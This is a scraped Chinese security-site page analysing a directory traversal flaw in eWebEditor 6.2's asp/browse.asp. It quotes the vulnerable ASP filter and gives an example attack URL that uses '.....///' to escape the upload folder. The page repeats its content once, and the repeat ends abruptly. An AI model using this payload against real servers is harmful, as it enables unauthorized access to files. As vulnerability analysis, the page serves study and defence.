您现在的位置是:网站首页> 编程资料编程资料
eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)_漏洞分析_网络安全_
2023-05-24
318人已围观
简介 eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)_漏洞分析_网络安全_
asp/browse.asp部分源码:
Dim s_ReturnFlag, s_FolderType, s_Dir
Dim s_CurrDir
s_ReturnFlag = Trim(Request.QueryString("returnflag"))
s_FolderType = Trim(Request.QueryString("foldertype"))
s_Dir = Trim(Request("dir"))
Select Case s_FolderType
Case "upload"
s_CurrDir = sUploadDir
Case "shareimage"
sAllowExt = ""
s_CurrDir = sPathShareImage
Case "shareflash"
sAllowExt = ""
s_CurrDir = sPathShareFlash
Case "sharemedia"
sAllowExt = ""
s_CurrDir = sPathShareMedia
Case Else
s_FolderType = "shareother"
sAllowExt = ""
s_CurrDir = sPathShareOther
End Select
s_Dir = Replace(s_Dir, "\", "/")
'下面两行是对目录跳转的处理,漏洞存在于此处
s_Dir = Replace(s_Dir, "../", "") '替换../为空
s_Dir = Replace(s_Dir, "./", "") '替换./为空
If Left(s_Dir,1)="/" Then
s_Dir = ""
End If
Dim s_Dir2
s_Dir2 = Replace(s_Dir, "/", "\")
If s_Dir <> "" Then
If CheckValidDir(s_CurrDir & s_Dir2) = True Then
s_CurrDir = s_CurrDir & s_Dir2
Else
s_Dir = ""
End If
End If
代码对../和./进行过滤用来防止目录跳转,但可以通过构造参数饶过检测.由于检测替换只进行一次可以使用....//代替上级目录,程序替换后....//变成../
攻击代码示例:
http://localhost/asp/browse.asp?action=file&type=file&dir=.....///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
跳转到上eWebEditor的DiaLog目录,查看返回页面的源文件:
eWebEditor
复制代码
代码如下:Dim s_ReturnFlag, s_FolderType, s_Dir
Dim s_CurrDir
s_ReturnFlag = Trim(Request.QueryString("returnflag"))
s_FolderType = Trim(Request.QueryString("foldertype"))
s_Dir = Trim(Request("dir"))
Select Case s_FolderType
Case "upload"
s_CurrDir = sUploadDir
Case "shareimage"
sAllowExt = ""
s_CurrDir = sPathShareImage
Case "shareflash"
sAllowExt = ""
s_CurrDir = sPathShareFlash
Case "sharemedia"
sAllowExt = ""
s_CurrDir = sPathShareMedia
Case Else
s_FolderType = "shareother"
sAllowExt = ""
s_CurrDir = sPathShareOther
End Select
s_Dir = Replace(s_Dir, "\", "/")
'下面两行是对目录跳转的处理,漏洞存在于此处
s_Dir = Replace(s_Dir, "../", "") '替换../为空
s_Dir = Replace(s_Dir, "./", "") '替换./为空
If Left(s_Dir,1)="/" Then
s_Dir = ""
End If
Dim s_Dir2
s_Dir2 = Replace(s_Dir, "/", "\")
If s_Dir <> "" Then
If CheckValidDir(s_CurrDir & s_Dir2) = True Then
s_CurrDir = s_CurrDir & s_Dir2
Else
s_Dir = ""
End If
End If
代码对../和./进行过滤用来防止目录跳转,但可以通过构造参数饶过检测.由于检测替换只进行一次可以使用....//代替上级目录,程序替换后....//变成../
攻击代码示例:
http://localhost/asp/browse.asp?action=file&type=file&dir=.....///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
跳转到上eWebEditor的DiaLog目录,查看返回页面的源文件:
复制代码
代码如下:
相关内容
- 最新win2003 II6解析漏洞实战及应用_漏洞分析_网络安全_
- 微软警告:泄露的Office 2010预览版或含病毒_漏洞分析_网络安全_
- 谨防黑客利用微软DirectShow漏洞传播木马_漏洞分析_网络安全_
- 微软称黑客利用非官方版Windows 7兴风作浪_漏洞分析_网络安全_
- phpwin7.0拿shell的方法_漏洞分析_网络安全_
- PHPWIND & DISCUZ! CSRF漏洞_漏洞分析_网络安全_
- phpcms2008 注入漏洞_漏洞分析_网络安全_
- 校内网最新 xss Cookies得到密码_漏洞分析_网络安全_
- 微软IIS6漏洞:服务器敏感信息易被窃_漏洞分析_网络安全_
- Gh0st控制端逻辑漏洞_漏洞分析_网络安全_
